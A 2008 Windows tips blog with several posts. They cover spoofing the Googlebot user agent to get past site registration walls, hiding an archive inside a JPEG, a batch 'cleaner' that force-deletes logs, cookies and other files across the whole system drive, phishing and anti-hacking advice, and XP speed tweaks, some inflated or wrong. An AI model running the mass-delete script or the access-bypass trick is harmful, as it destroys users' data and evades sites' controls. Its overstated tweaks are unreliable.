Thursday, November 27, 2008

secret door to many sites using google





many of us have experienced this we try to search for something in google; the engine returns with a number of finds, but if you try to open the ones with the most promising content, we are confronted with a registration page instead, and the ccontent we are looking for will not be revealed to us unless we agree to a credit card transaction first or a registration is needed to access the contents....

can we solve this yes we can let me tell u one thing that google can go in or lurk around those dark corners in the internet where we cannot.
so if we use google as our mask then we can also make it
but why google can access???? u r thinking right
lets see for ourselves
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.

How then, can you disguise yourself as a Googlebot? simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension from this url:
help://chrispederick.myacen.com/work/firefox/useragentswitcher/download/
Read rest of entry

hide ur file in an image in a techy way using winrar





1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b sun.jpg + secret.rar sun.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from sun.jpg to sun.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there
Read rest of entry

figure out ur motherbard


Whenever I install Windows I have to search for my
motherboard CD for installing drivers of sound, LAN, graphics etc and majority of times it takes hell a lot of time to search for driver CD. At least I find it very difficult to keep my CD in a safe place so that I can use it when I need it.

But what will you do if motherboard driver CD gets lost, I know you will say that you'll go to Internet and download all the desired drivers from there but for that you should know the model number also. If you have lost your motherboard CD and do not know your motherboard model number and want to download or update your drivers, here is a very good application for you.

Driver Genius :


Driver Genius Professional manage your PC to get 100% up to date Drivers and optimize PC performance. Driver Genius Professional is a powerful driver manager for Windows that canbackup, restore ,search and update your drivers automatically in several mouse clicks! 


Yes, you can backup all your installed drivers and can restore it back when needed. Without going to any website you can easily download and install required drivers. Isn't this a useful application !!


Have a quick look at some features of this software :


  • Quickly backup device drivers for your computer.
  • Backup your drivers to a ZIP or EXE self-extracting file.
  • Clone your drivers to an auto-setup package.
  • Wizard mode allow you step by step backup or restore your drivers.
  • Get detailed information about your installed devices.
  • Search for drivers for non-Internet connected computer.
  • Easy to get the most recent drivers for your computer.
  • Search all available drivers update by one click.
  • Live update your drivers information database online.
It works on the following Operating Systems : Windows 98/98SE /ME/2000/XP/2003/Vista/XP x64/Server 2003 x64/Vista x64.

This is a must have application and visit their official website to download this application.
Read rest of entry

a brief tutorial on peer to peer (p2p) file sharing


A Peer-to-peer (or P2P) network is a network made up of computers which are connected to each other through the Internet. Files of all types can be shared between computers on the P2P network, allowing Internet users to transfer files directly, rather than through the use of a website or server. Each user (or “node”) connects to the networkusing a “client” program.

File sharing is the practice of making files available for other users to download over the Internet and smaller networks. Usually file sharing follows the peer-to-peer (P2P) model, where the files are stored on and served by personal computers of the users. Most people who engage in file sharing are also downloading files that other users share - usually these two activities are linked together. P2P file sharing is distinct from file trading in that downloading files from a P2P network does not require uploading, although some networks either provide incentives for uploading such as credits or force the sharing of files being currently downloaded.
Some client programs connect to the same network(s), therefore resulting in similar search results within both programs. Click here for more information about P2P, how it works, and a list of clients and networks.
Peer-to-Peer Network (P2P)courtesy Wikipedia.comServer-based Network - courtesy Wikipedia.com

What does P2P file sharing have to offer?

Everything can be found on the P2P networks, all for free. Anything that anyone could possibly have on their computers is out there. Unlike BitTorrent, where ‘uploading’ has to done deliberately, P2P software can simply scan a computer (or folders) to search for files to share. Users that want to share their files need not do anything; it is done by the software. Below is a sample of what types of files are shared on P2P, and our comments about each category.

Movies 

Not great for full movies. The underground movie ’scene’ does NOT release movies here. Quality is often compromised because of size, so you really have to know what to look for. Also, P2P is a target of “spoofing” in which the file is named correctly but upon arrival, it is not what it seems. Also, it is extremely difficult to tell the good from the bad when forty different search results come back for the same movie. There are good releases are out there, it just takes a bit of a trained eye to sort through.

Software 

Mostly atrocious for software, games, and applications as *.EXE downloads can be infected with viruses and/or malware. Very risky business, not recommended at all.

TV Shows 

Not bad for TV shows, as these tend to be smaller. PROs: Users can download the latest episode of their favorite show, and the speed is good. CONs: If you like to have full seasons of television shows, stick with BitTorrent. As with movies, avoid video files with the *.WMV extension.

Video Clips 

Good for miscellaneous movie clips, music videos, trailers, other videos etc. - large selection due to the demography of the people who use P2P.

Music 

Excellent for music. PROs: Users can find and select songs easily, and play them while they’re downloading. HUGE selection of songs, remixes and rare items. Fast downloads with a quick Internet connection.CONs: Most *.mp3 files on P2P sites are only at 128 bitrate. Music on regular CDs is ‘compared’ to 192. If available, select files with a higher than 128 bitrate. I prefer a 256 - 320 bitrate or VBR (Variable bitrate) so I tend to use mIRC and torrents for music. Also, anyone can rip a song off a CD and put it in their “shared” folder, therefore many songs contain small jumps, crackles etc., and these sub-par versions spread fast throughout P2P. I recommend listening through the songs first before making that CD for Dad for Father’s Day.

Miscellaneous 

Great for pictures, clipart, documents, etc.
Read rest of entry

speedup folder browsing in xp








You may have noticed that everytime you open my Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:

1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
Read rest of entry

renaming start button in win-xp


yep we can change the name of the start butoon to any name v want here goes the tutorial



1. Download Resource Hacker on to desktop. It is a small program and doesn't need installation.

2. Go to Tools>Folder Options>"View" tab> Uncheck "Hide Extensions for known file types".

3. Propagate to X:Windows and copy explorer.exe. Paste it on desktop.

4. Open Resource Hacker. Drag & drop the copied explorer.exe file.

5. In the left pane of Resource Hacker, propogate to "String Table" and select "1033" in 37 sub string.
In the right hand side, now you can see a compilation of some strings. The string corresponding to 578 is the "start" tab text.
6. Replace start to desired text. It can be more than 5 characters and can include spaces too. Then click "Compile Script".
7. Now "save" the file and exit Resource Hacker. After saving the file, you will seeexplorer_original.exe created automatically on desktop. This is a back-up created by Resource Hacker.
8. Now your explorer.exe is ready. You need to replace the original file in Windows directory with this one. You can't copy paste or overwrite the file. Windows File protection system will not allow you to do that.
9. Download Replacer on to desktop. It also doesn't need any installation. It is used for replacing files.
10. Open Replacer
11. It will ask for original file to replace. Drag & drop explore.exe from windows directory.
12. Then it will ask for the new file which will replace the original file. Drag & drop alteredexplorer.exe from desktop.
13. Confirm the process by typing "Y".
14. It's all done now. Reboot the system and you will see that the start button text is changed. 
Read rest of entry

Tuesday, November 25, 2008

trick to create a "temporary file cleaner" w/o using any 3rd party software

copy the following code in a notepad and save it with any file name but with a .bat extension(donot forget to save as "all files"

[HIDE]@echo off echo file Cleaner echo waiting del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %systemdrive%\recycled\*.* del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\temp del /f /q %userprofile%\cookies\*.* del /f /q %userprofile%\recent\*.* del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*? del /f /s /q ?%userprofile%\Local Settings\Temp\*.*? del /f /s /q ?%userprofile%\recent\*.*? echo complete! echo. & pause [/hide]
Read rest of entry

Sunday, November 23, 2008

classification of virus



Types Of Virus

Trojan horse

A Trojan horse is a program designed as to seem to being or be doing one thing, such as a legitimate software, but actually being or doing another. They are not necessarily malicious programs but can be. A trojan horse can be used to set up a back door in a computer system so that the intruder can return later and gain access. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called trojan horses. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)

Virus

A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Thus, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells.

Worm

Like a virus, a worm is also a self-replicating program. The difference between a virus and a worm is that a worm does not create multiple copies of itself on one system: it propagates through computer networks. After the comparison between computer viruses and biological viruses, the obvious comparison here is to a bacterium. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program. It is possible for a program to have the blunt characteristics of both a worm and a virus.

Key loggers

Key loggers are used by hackers to spy on a target computer or system by recording the keys pressed by users, thereby capturing useful information such as passwords when they are typed by users. Key loggers can also be used for safety, such as when police forces use them to spy on chat rooms and enable them to find pedophiles.
Read rest of entry

tips 2 defend ourselves from getting hacked



Protect Urself !

Follow These Simple Guidelines n u are done


*** Under the security option tab of Mozilla Firefox there is an option Show Passwords make sure its protected by the master password.


1. U may avoid using Internet Explorer(old versions) and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus,

5. Boot into safe mode and run all three scans (once in a month)

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it, at least quarantine it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your major passwords, mostly bu using a virtual keyboard(to prevent keyloggers).

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!


I am being stalked / spied . now what!!

As email providers give away more and more storage space, more and more personal information is being stored in those accounts. People are increasingly using their email accounts for more than just email - it has become their online document storage area with backup documents such as passwords, bank account numbers, account usernames, scans of correspondence and much more. Even if you don’t use your email for this purpose, you may still be inadvertantly revealing personal information in general conversation emails to family and close friends. A 6GB Gmail account or an unlimited space Yahoo account is potentially an information bonanza source for identity thieves who manage to figure out your email password and then go snooping. But if someone HAS cracked your email password, it may not be apparent to you. A snooper can easily read an email then mark it as unread again. So the best thing to do would be to set up an “electronic tripwire” so if someone breaks into your account, you’ll know about it. Here’s how to do it :
    1. Sign up for a website hit counter at www.onestatfree.com. You can leave a fake name and whatever URL you want (I used Google.com for mine). 2. You will then receive a welcome email from OneStat with a text attachment called OneStatScript.txt. Download this attachment to your computer and then delete the email (you don’t want any email snoopers finding it later). But before deleting the email, write down your OneStat account number as you will need it later.3. Change the name of the text document to something that will make the email snooper salivate such as passwordlist. Also change the file format from a text document to a website page. So make it something like passwordlist.htm .4. Email this newly-renamed file as an attachment to the email account you want to monitor. Make sure the email subject title also lures the snooper in (maybe something like List of Passwords. You get the idea :).5. The trap is now set. Basically if someone opens the email and opens the attachment, OneStat will record a hit. If you then log into your OneStat account say once a day, you will see how many hits you have had to your attachment.onestat.png
The OneStat account page then gives you details on each “visitor” including the date and time they accessed the web document and more importantly their location and IP address! So how does having this information help you? Well first of all, it will alert you to change your password to something stronger. Secondly, if you see the snooper’s location and you only know one or two people there then it narrows down your list of potential suspects.
Read rest of entry

Phishing "Protect urself from it" !


Phishing continues to be one of the most significant security threats facing Internet users. During 2007, scammers distributed millions of phishing scam emails that targeted many different entities. Phishing attacks are sure to continue in 2008 and scammers will use such attacks to steal money and identities from many new victims around the world. Armed with a little knowledge about how phishing scams work, however, you can ensure that you do not become one of these victims.


Phishing Scammer
Phishing scammers continue to find new victims all around the world


A phishing scam is one in which victims are tricked into providing personal information such as account numbers, passwords and credit card details to what they believe to be a legitimate company or organization. In order to carry out this trick, the scammers often create a "look-a-like" webpage that is designed to resemble the target company's official website. Typically, emails are used as "bait" in order to get the potential victim to visit the bogus website. The emails use various devious ruses to trick readers into clicking on the included links, thereby opening the bogus website. Information submitted on these bogus websites is harvested by the scammers and may then be used to steal funds from the user's accounts and/or steal the victim's identity.

Phishing scam emails are created to give the illusion that they have been sent by a legitimate institution. Emails may arrive in HTML format and include logos, styling, contact and copyright information virtually identical to those used by the targeted institution. To further create the illusion of legitimacy, some of the secondary links in these bogus emails may lead to the institution's genuine website. However, one or more of the hyperlinks featured in the body of the email will point to the fraudulent website.

Links in phishing scam messages are often disguised to make it appear that they lead to the genuine institution site. The sender address of the email may also be disguised in such a way that it appears to have originated from the targeted company. Because they are sent in bulk to many recipients, scam emails use generic greetings such as "Dear account holder" or "Dear [targeted institution] customer". If an institution needed to contact a customer about some aspect of his or her account, the contact email would address the customer by name.

Phishing scam emails use a variety of ruses to explain why it is necessary for recipients to provide the requested information. Often, the messages imply that urgent action on the part of the recipient is required. Some of the most common ruses are listed below. The scam emails may claim that:


  • The customer's account details need to be updated due to a software or security upgrade.

  • The customer's account may be terminated if account details are not provided within a specified time frame.

  • Suspect or fraudulent activity involving the user's account has been detected and the user must therefore provide information urgently.

  • Routine or random security procedures require that the user verify his or her account by providing the requested information.
The entire purpose of a typical phishing scam is to get the recipient to provide personal information. If you receive any unsolicited email that asks you to click a link and provide sensitive personal information, then you should view the message with the utmost suspicion. It is highly unlikely that a legitimate institution would request sensitive information in such a way. Do not click links or open attachments in such messages. Do not reply to the senders. If you have any doubts at all about the veracity of the email, contact the institution directly to check.

This article focuses primarily on email based phishing. However, it should be noted that phishing attacks on social networking sites are also becoming more common. Scam messages may be posted as comments or via personal message systems on social networking sites such as Facebook and MySpace. The messages often contain seemingly innocent invitations to click an included link to view images or read member profiles. However, clicking links in these bogus messages will open a fake version of the social networking site's login page. Victims who login to the fake page will be inadvertently sending their login details to scammers who will then have complete access to their accounts.

Generally speaking, people become victims of phishing scams simply because they do not know how such scams operate. You can help by ensuring that friends and colleagues are aware of such scams and what to do about them. The power of such "word-of-mouth" education is substantial. You CAN make a difference by sharing your knowledge of phishing scams with other Internet users.


Protect Yourself


Rather than using the provided link in the email, you should copy the link and email it to the legitimate company or business, asking if the email is legitimate. If it is frudlante this could help shut down phisher faster.
Only use the address that you have used before, or start at your normal homepage.
Most companies require you to log in to a secure site. Look for the lock at the bottom of your browser and “https” in front of the Website address.


if u wont believe this then ill show u a demo
http://link-protector.com/656695/

try this friends
Read rest of entry

Trick to find who are online though they appear offline

Just go to

http://www.invisible.ir
http://www.xeeber.com

and enter victims Yahoo! ID… Click go and you are done!

credit : site contributer :

it works !!


Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:

Find who is Invisible on Yahoo messenger - The Ethical Hacking 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.

Find who is Invisible on Yahoo messenger - The Ethical Hacking


Alternate Method:


Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.

Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.
Read rest of entry

speed up xp booting by 21 times






run -> msconfig - Hit Enter

Awesome tricks Explained here for u




Whenever you start your computer, you are faced with a few moments of thumb twiddling while Windows XP boots and prompts you to log on. Although you should expect to wait for a few moments, sometimes Windows XP seems to boot rather slowly. In fact, you may notice that over a period of time the PC that used to roar to life seems a bit sluggish instead. Fortunately, you can perform several techniques that help Windows XP get the bootup speed you want. This Article explores how to put these techniques to work.


Stopping Unneeded Startup Services !


Along with the core operating system and programs that Windows XP runs when it starts, there is also a host of services involved. Many of these services are necessary for Windows XP to operate correctly. However, many of them are for features in Windows XP that you may not use at all. You can peruse the services and disable any service that you do not want to run. The fewer services that run, the more quickly Windows XP will boot.

Caution:

Exercise caution when stopping services. If you do not know what a service does or are unsure of the ramifications of stopping the service, leave it alone. Some services are critical to Windows XP's operations, so make sure you understand what the service is before you disable it.


To reduce the number of services that start on bootup, you can access two different areas of Windows XP. The first is the System Configuration Utility. The Services tab shows you the services that start when the computer boots.
You can stop a service from starting by simply clearing the check box next to the service and clicking OK. However, before you do so, there is another way to disable services that you may prefer because the interface gives you more information about the service in question.


Open Control Panel/Administrative ToolsServices or else select Start/Run, type services.msc, and click OK. Either way, you see the Services console.
I prefer to use the Services console instead of the System Configuration Utility because it describes what the service does. Additionally, you can double-click a service and examine its properties.

Notice the Startup Type column in Figure 4-2. This information lists whether the service is automatic or manual. Manual services are only started in Windows XP when you start a process that requires the service. Some other process may require the service that has a "dependency" relationship with it; in this case, the dependency service will start, as well. Because these services do not start automatically when you boot Windows XP, you do not need to do anything with manual services.


However, all services listed as automatic start when Windows XP boots. These are the services that increase boot time. As I have mentioned, many of them are necessary and important, so you should not stop automatic services from booting unless you are sure of the ramifications. You can get this information by looking at the Description column. Here's a quick look at common services you may want to live without:


SPEED UP BOOT BY DISABLING UNUSED PORTS.!!


You may have tried many tweaks like modifying windowsXP start-up applications, prefetches, unload DLLs method,etc. And yes those methods do work for me.
I have just accidentally found out another way to give you an extra boost in windowsXP's boot performance. This is done by disabling your unused devices in
Device Manager. for example, if you don't have input devices that are connected to one of your USBs or COM ports, disabling them will give you an extra perfromance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don't use for your PC and then restart.


Do Dis !!

1.Start Registry Editor (Regedit.exe).

2.Locate the following key in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\PrefetchParameters

3.Make sure you backup the keys by exporting them to a .reg file.

4.On the EnablePrefetcher value, change the setting from 3 to 5 (decimal).

5.Close the registry editor.

6.Restart your computer


Automatic Updates !

This service enables Windows XP to check the Web automatically for updates. If you don't want to use Automatic Updates, you can disable the service. You can always check for updates manually at the Windows Update Web site.

Computer Browser: If your computer is not on a network, you don't need this service. If you are on a network, leave it alone.

DHCP Client: If you are not on a network, you do not need this service. If you are on a small workgroup, you can still increase boot time by configuring manual IP addresses (which I explore later in this chapter).

DNS Client: If you are not on a network, you do not need this service. If you are, leave it alone.

Error Reporting and Event Log: You don't have to use these services but they can be very helpful, so I would leave them configured as automatic.

Fax: If you don't use your computer for fax services, you can disable this one.

Help and Support: If you never use the Windows XP Help and Support Center (found on the Start menu), you can disable this service.

IMAPI CD-Burning COM: This service enables you to burn CDs on your computer. If you never burn CDs, you can disable the service.

Indexing Service: Your computer keeps an index of files but if you rarely search for files, the service is just a resource hog. You can stop it and turn the service to manual.

Windows Firewall/Internet Connection Sharing: If you do not use these features, you can disable them.

Infrared Monitor: If you do not use infrared devices, you can disable this service.

Messenger: This service sends alert messages on a local area network (it is not the same as Windows Messenger). If you are not on a network, you can disable this service.

Print Spooler: If you do not do any printing from the computer, you can disable this service. If you print, make sure you leave it as automatic.

Remote Registry: This service allows remote users to modify the Registry on your computer. If you are not on a network, you can disable this service.

System Restore Service: This service allows you to use System Restore. If you have turned off System Restore anyway, you do not need to turn off the service. If you do, you turn off System Restore.

Themes: If you do not use themes, you can disable this service.

Windows Image Acquisition: If you do not use scanners or digital cameras, you can disable this service.

Wireless Zero Configuration: If do not use wireless networking devices, you can disable this service.




You may have a number of other automatic services, depending on software and other configurations on your computer. So it's a good idea to look through the services and learn more about them. If you double-click a service, a Properties dialog box appears
Notice that on the General tab, you see a Startup Type drop-down menu. If you want to change an automatic service to manual, select Manual here and click OK. As a general rule, don't disable a service unless you are sure you will never use it. However, manual configuration allows the service to be started when you find it necessary, thus speeding up your boot time.
However, before you change a service to manual, look at the Dependencies tab (see Figure 4-4). This tab shows you which other services depend upon the service you are considering changing.
Keep in mind that services are necessary for the vast functionality you get with Windows XP. Change only those services that you understand and do not use. How you use your Windows XP computer should be the best guide in terms of optional startup services.


Tip !


The Indexing service and the System Restore service take up a lot of disk space and system resources across the board. You can live without the Indexing service but I suggest that you keep using System Restore. It works great when you are in a bind and this is one case where the loss of speed may not be worth the ramifications of not using System Restore.


Speed Tips and Tricks for Windows XP Startup

Aside from startup programs, services, and the Prefetch folder, there are a number of other startup procedures and issues you can modify to help Windows XP start faster. The following sections explore those tips and tricks.


Manual IP Addressing on Small Office/Home Networks
Windows XP is configured to help you take care of networking. It uses the TCP/IP protocol for networking in workgroups, or what you might call small office or home networks that do not use a dedicated server.

The problem is that automatic IP addressing can be slow. When your computer boots, it has to query the network to see what IP addresses are already in use and then assign itself one. If you want to speed up the boot time a bit, consider manually assigning IP addresses to all computers on the network. This way, the network computers do not have to worry about locating an automatic IP address. Because one is manually configured, the operating system doesn't have to spend time solving this problem.

This isn't a networking book, however, so I won't delve into the implications of using a manual IP address, but if you are using a computer that functions as a host computer to the Internet (using Internet Connection Sharing [ICS]), you can get into connectivity problems if you change the configuration of the IP address. However, you can still work around this problem by starting with the ICS host computer.

Select Start/Connect To/Show All Connections. Right-click your network adapter card and click Properties. On the General tab, select TCP/IP in the list of services and click the Properties button.

In the TCP/IP properties, you can see if you use an automatic or manual IP address. In the example in Figure 4-5, I have configured a manual IP address of 90.0.0.1 and a default subnet mask. The other computers on my office network each use a different IP address in the same class, such as 90.0.0.2, 90.0.0.3, 90.0.0.4, and so on. This way, each computer has a permanent IP address, which helps increase boot time. Note that if you change the IP addresses of your computers, they must all use the same subnet mask. A default subject mask of 255.255.255.0 will keep you in good shape.

Make sure you understand the implications of changing IP addresses on your network. If you have no networking experience at all, you may be wiser to leave the automatic IP addressing as is and try to gain some speed using the additional suggestions in this chapter.


Disabling Recent Documents History !


Windows XP includes a feature that keeps track of all recent documents you have opened or used. The idea is that you can select Start/Recent Documents History and quickly reopen any document you have recently used. I use many documents each day and never use the feature myself. In my opinion, I can keep up with what I want to use without Windows XP doing it for me.
The bad thing about Recent Documents History is that Windows XP has to calculate what should be put there each time you boot Windows, which can slow things down. So, if you never use the Recent Documents History, it's a good idea to disable it. Here's how:
1. Open the Registry Editor (select Start/Run, type regedit, and click OK).
2. Navigate to HKEY_CURRENT_USER\Software\Mcft\Windows\ CurrentVersion\Policies\Explorer.
3. Create a NoRecentDocsHistory D_WORD key. Double-click the value to open it once it is created.
4. Set the Data Value to 1 to enable the restriction.
5. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect.


Disabling the Boot Logo !


You can remove the boot logo that appears when you start Windows XP. This little tweak probably shaves only a few seconds off your boot time but seconds count if you are serious about trying to get Windows XP up and running as quickly as possible. The only negative is that if you remove the boot logo, you will also not see any boot messages, such as check disk. (But if you are not having problems with your computer, this isn't such a big deal.)
To remove the boot logo, follow these steps:
1. Select Start/Run, type msconfig, and click OK.
2. In the System Configuration Utility, click the BOOT.INI tab.
3. On the BOOT.INI tab, click the NOGUIBOOT check box option. Click OK.


Removing Unwanted Fonts !


One trick that increases your boot time a bit is to lose any fonts in the Fonts folder in Control Panel that you never use. The more fonts you have, the more processing Windows XP has to do to prep all of those fonts for use. You must be a bit careful here to not remove fonts that you might want, but there is a good chance that you can live without many of them. For instance, you may have foreign language fonts and other symbol fonts (such as Wingdings) that you never use.
To delete unneeded fonts, follow these steps:
1. Open the Fonts folder in Control Panel.
2. Select Edit/Select All and then Edit/Copy.
3. Create a new folder on your desktop, open it, and select Edit/Paste.
4. In this new folder, delete any of the fonts you do not want.
5. Return to the Fonts folder in Control Panel. Right-click the selected fonts and click Delete.
6. Go back to your new desktop folder and click Edit/Select All.
7. Return to your Fonts folder and click Edit/Paste. You now have only the desired fonts in the Fonts folder.


Tip:


You can directly delete fonts from the Fonts folder without creating the secondary folder. However, I recommend the preceding steps to help ensure that you do not make a mistake in the deletion process.


Stopping Remote Assistance and Remote Desktop Sharing !


In Windows XP Professional, you have two remote networking features called Remote Assistance and Remote Desktop Sharing. These remote networking features are very helpful in a variety of situations but if you don't use them, it is good idea to disable them to save boot time. You can always enable them later if you want to use them.
Note:
If you are interested in using Remote Desktop or Remote Assistance, see my book Windows XP for Power Users: Power Pack published by John Wiley & Sons.
1. Open the Start menu, right-click My Computer, and choose Properties.
2. Click the Remote Tab.
3. Clear both check boxes to disable Remote Assistance and Remote Desktop.


Speeding Up the Dual-Boot Timeout !


If you dual-boot your computer with Windows XP and another operating system, you see an operating system selection menu on startup. If you typically boot into Windows XP and not the other operating system, you can speed up the dual-boot timeout value so that you do not wait so long for the boot process to select your default operating system and continue with the boot process. The default timeout value is 30 seconds but you can change this setting to 10. This gives you enough time to select the alternate operating system if you want but also speeds up the boot process. You can skip this section if you do not use a dual-boot configuration.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10 (see Figure 4-11).
4. Select File/Save and close Notepad.


Speeding Up Your PPPoE Connection !


If you use a Point-to-Point Protocol connection over Ethernet (PPPoE), you may notice a delay in using the PPPoE connection after startup. By default, there is a 120 second delay but you can stop this behavior by manually configuring an IP address for the network adapter card. If you do not use a PPPoE connection, you can skip this section.
1. Select Start/Connect to/Show All Connections.
2. Open the TCP/IP properties for your LAN network interface card.
3. Manually set the IP address on the TCP/IP properties to an appropriate IP address and subnet mask for your network.


Reducing the Wait Time


When you start to shut down Windows XP, it has to quit, or "kill," any live applications or processes that are currently running. So close all applications first. However, some applications and processes are always running in the background. You can reduce the amount of time that Windows XP waits for those applications and processes to close before Windows XP kills them. Edit three different Registry settings to change this:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop. Select WaitToKillAppTimeout and set the value to 1000.
3. Select the HungAppTimeout value and set it to 1000 as well.
4. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout \newline value and set it to 1000 as well.
5. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 1000.
6. Close the Registry Editor.

Automatically Killing Tasks on Shutdown !


You know the drill. You start to shut down the computer, you wait a few moments, and then you see a dialog box asking if you want to kill an application or service that is running. Instead of prompting you, you can make Windows XP take care of the kill task automatically. Here's how:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
3. Highlight the value AutoEndTasks and change the value to 1.
4. Close the Registry Editor.

More

Here's a great tip to speed up your browsing of Windows XP machines. Its actually a fix to a bug installed as default in Windows 2000 that scans shared files for Scheduled Tasks. And it turns out that you can experience a delay as long as 30 seconds when you try to view shared files across a network because Windows 2000 is using the extra time to search the remote computer for any Scheduled Tasks. Note that though the fix is originally intended for only those affected, Windows 2000 users will experience that the actual browsing speed of both the Internet & Windows Explorers improve significantly after applying it since it doesn't search for Scheduled Tasks anymore. Here's how :

Open up the Registry and go to : HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace Under that branch, select the key : {D6277990-4C6A-11CF-8D87-00AA0060F5BF} and delete it. This is key that instructs Windows to search for Scheduled Tasks. If you like you may want to export the exact branch so that you can restore the key if necessary. This fix is so effective that it doesn't require a reboot and you can almost immediately determine yourself how much it speeds up your browsing processes.
Read rest of entry

calculating in command prompt





friends do u know that The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers u can perform unary, arthimetic, logical and bitwise calculations in it:

try this
goto run -->type cmd press enter

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.


interesting isnt it...........
Read rest of entry

Saturday, November 22, 2008

blocking website in a techy way





